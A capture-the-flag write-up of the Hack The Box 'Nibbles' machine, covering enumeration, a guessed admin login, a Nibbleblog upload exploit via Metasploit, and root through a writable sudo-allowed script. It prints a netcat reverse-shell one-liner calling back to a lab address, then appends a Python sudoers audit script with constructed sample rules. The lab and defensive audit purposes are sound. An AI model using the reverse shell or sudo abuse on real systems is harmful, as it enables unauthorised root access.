Hack The Box: Nibbles


Enumeration


The nmap scan reveals two ports: 22 and 80.

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


In the comments of the HTML page, we find the following hint:

<!-- /nibbleblog/ directory. Nothing interesting here! -->

The subdirectory nibbleblog/ reveals a webpage:


gobuster reveals an admin directory and also an admin-php page:


The login is admin:nibbles, which is mostly guessing. I found some hints that this might be the case so I tried it.


Initial Foothold

The Nibbleblog version is 4.0.3 and has a file upload vulnerability. For example, we could upload a reverse shell to the admin image, at least according to this exploit script which I did not try. I simply used Metasploit to do the job.

meterpreter > getuid
Server username: nibbler

With this, we can grab the user flag. Now let’s try to get root. sudo -l reveals something interesting: we can execute a script called /home/nibbler/personal/stuff/monitor.sh as user root.

The original monitor.sh file can be found in a zip file in Nibbler's home folder, but actually we do not need it; we can simply craft our own. After some testing, I used the netcat OpenBSD reverse shell from Payloads All The Things:

$ echo 'rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.31 4444 >/tmp/f' > monitor.sh

And then execute it with:

sudo -u root sudo /home/nibbler/personal/stuff/monitor.sh

And with this, we get a root shell and the flag.
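The root path on this box exists because a sudoers rule lets nibbler run, as root, a script that lives inside nibbler's own home directory, so the user can replace the script with whatever they like. The following is an added defensive audit example, not part of the original writeup: it parses sudoers-style rules and flags any non-root rule whose command lives under the invoking user's home or in a world-writable directory, or grants ALL. The sample sudoers text is constructed (the nibbler line mirrors the rule described above; the other users are made up), the default home layout /home/<user> is an assumption, and the rule regex covers the common single-line form only.

```python
import re

# Constructed sample sudoers content. The nibbler line mirrors the rule found
# via `sudo -l` in the writeup; backup and deploy are made-up control cases.
SAMPLE_SUDOERS = """
# User privilege specification
root    ALL=(ALL:ALL) ALL
nibbler ALL=(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
backup  ALL=(root) NOPASSWD: /usr/local/sbin/run-backup.sh
deploy  ALL=(root) /tmp/deploy.sh
"""

# Directories any local user can write to: a root-run command placed here
# can be swapped out by anyone on the host.
WORLD_WRITABLE_DIRS = ("/tmp", "/var/tmp", "/dev/shm")

# user  host=(runas) [TAG: ...] command[, command...]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^\s=]+)\s*=\s*\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$"
)


def parse_sudoers(text):
    """Parse single-line sudoers rules into dicts; comments and blanks are skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue  # Defaults/aliases and other forms are out of scope here
        tags = {t.strip().upper() for t in m.group("tags").split(":") if t.strip()}
        cmds = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
        rules.append({"user": m.group("user"), "runas": m.group("runas"),
                      "tags": tags, "cmds": cmds})
    return rules


def _under(path, directory):
    """True if path is directory itself or lies beneath it."""
    return path == directory or path.startswith(directory.rstrip("/") + "/")


def audit_sudoers(text, homes=None):
    """Return findings for rules that let a non-root user run a privileged
    command from a location that user (or everyone) can modify."""
    homes = homes or {}
    findings = []
    for rule in parse_sudoers(text):
        if rule["user"] == "root":
            continue
        # Assumption: home is /home/<user> unless the caller supplies a mapping
        # (a real audit would read it from /etc/passwd).
        home = homes.get(rule["user"], f"/home/{rule['user']}")
        for cmd in rule["cmds"]:
            path = cmd.split()[0]  # drop any argument restrictions
            if path == "ALL":
                reason = "unrestricted (ALL) command"
            elif _under(path, home):
                reason = "command lives in the invoking user's home directory"
            elif any(_under(path, d) for d in WORLD_WRITABLE_DIRS):
                reason = "command lives in a world-writable directory"
            else:
                continue
            findings.append({
                "user": rule["user"],
                "runas": rule["runas"],
                "command": path,
                "nopasswd": "NOPASSWD" in rule["tags"],
                "reason": reason,
            })
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        pw = "NOPASSWD" if f["nopasswd"] else "password required"
        print(f"{f['user']} -> ({f['runas']}) {f['command']}: {f['reason']} [{pw}]")
```

Run against the sample, the audit reports the nibbler rule (home-directory script, NOPASSWD) and the deploy rule (/tmp), while the backup rule pointing at a root-owned /usr/local/sbin path passes. The fix on the nibbler side is the same either way: the script must live in a root-owned, non-user-writable location, or the rule should go.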